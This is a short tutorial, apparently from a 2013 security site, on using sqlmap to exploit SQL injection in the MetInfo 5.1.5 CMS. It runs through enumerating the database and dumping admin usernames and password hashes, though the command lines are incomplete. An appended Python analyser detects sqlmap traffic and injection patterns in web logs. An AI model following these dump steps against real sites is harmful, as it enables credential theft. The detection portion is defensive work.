Using Sqlmap to test the MetInfo enterprise website management system for a MySQL injection vulnerability

ID MYHACK58:62201339711
Type myhack58
Reporter Anonymous
Modified 2013-07-18T00:00:00


Last time, Fork Fork walked through a simple Sqlmap injection tutorial against an Access database; this time we cover the MySQL case.

MetInfo is a feature-rich enterprise website management system built on a PHP + MySQL architecture.

Fork Fork downloaded the free version of MetInfo 5.1.5. Rather than being picky and auditing the source code, we simply threw the site into WVS for a scan.

[Screenshot: WVS scan results]

Having found the injection point, open BackTrack 5 and run the Sqlmap tool.

[Screenshot: Sqlmap running in BackTrack 5]

Get the current user name by entering the command: python -u --current-user


Get the current database name by entering the command: python -u --current-db

[Screenshot: current database name]

The database name returned is: met


List the table names in the database by entering the command: python -u --tables -D "met". The table names of the "met" database are retrieved successfully, as shown below:

[Screenshot: tables in the met database]

List the fields of the admin table by entering the command: python -u --columns -T "met_admin_table" -D "met"

[Screenshot: fields of met_admin_table]

The figure above shows that the fields of met_admin_table were obtained successfully. Next, dump the contents of admin_name and admin_pass by entering the command: python -u --dump -C "admin_pass,admin_name" -T "met_admin_table" -D "met"
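From the defender's side, every enumeration step above leaves recognisable traces in the web server's access log. The following is an added example (not part of the original post) that scans constructed combined-format log lines for sqlmap's default User-Agent and for the UNION, information_schema, time-based and tautology probes its --tables and --dump phases rely on; the log format and the /page.php?id= path are assumptions, not MetInfo's real endpoint.

```python
import re
from urllib.parse import unquote_plus

# Constructed combined-format access log lines (not from the original post); the
# vulnerable path /page.php?id= is a placeholder, not a real MetInfo endpoint.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Jul/2013:10:01:02 +0800] "GET /page.php?lang=cn HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Jul/2013:10:02:15 +0800] "GET /page.php?id=1 HTTP/1.1" 200 4870 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.9 - - [18/Jul/2013:10:02:16 +0800] "GET /page.php?id=1%27%20UNION%20SELECT%20NULL%2CNULL-- HTTP/1.1" 200 4901 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Jul/2013:10:02:17 +0800] "GET /page.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Traces that sqlmap's enumeration phases (--current-db, --tables, --dump) leave
# in the decoded query string, whatever User-Agent it was told to send.
SQLI_MARKERS = [
    ("union_select", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S)),
    ("information_schema", re.compile(r"information_schema", re.I)),
    ("time_based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("boolean_tautology", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("comment_terminator", re.compile(r"(--|#|/\*)\s*$")),
]

def analyse_line(line):
    """Return the detection tags for one log line ([] means it looks benign)."""
    m = LOG_RE.match(line.strip())
    if not m:
        return ["unparseable"]
    tags = []
    if m.group("ua").lower().startswith("sqlmap"):   # default UA, trivially changed
        tags.append("sqlmap_user_agent")
    query = unquote_plus(m.group("path").partition("?")[2])  # decode %27, %20, + ...
    for name, rx in SQLI_MARKERS:
        if rx.search(query):
            tags.append(name)
    return tags

def suspicious_sources(log_text):
    """Map each client IP to the set of tags seen across its requests."""
    report = {}
    for line in filter(None, log_text.splitlines()):
        tags = analyse_line(line)
        if tags:
            report.setdefault(line.split(" ", 1)[0], set()).update(tags)
    return report
```

Matching on the User-Agent alone is weak, since sqlmap can be told to send any string; the query-string markers are what catch the enumeration phases regardless of the client.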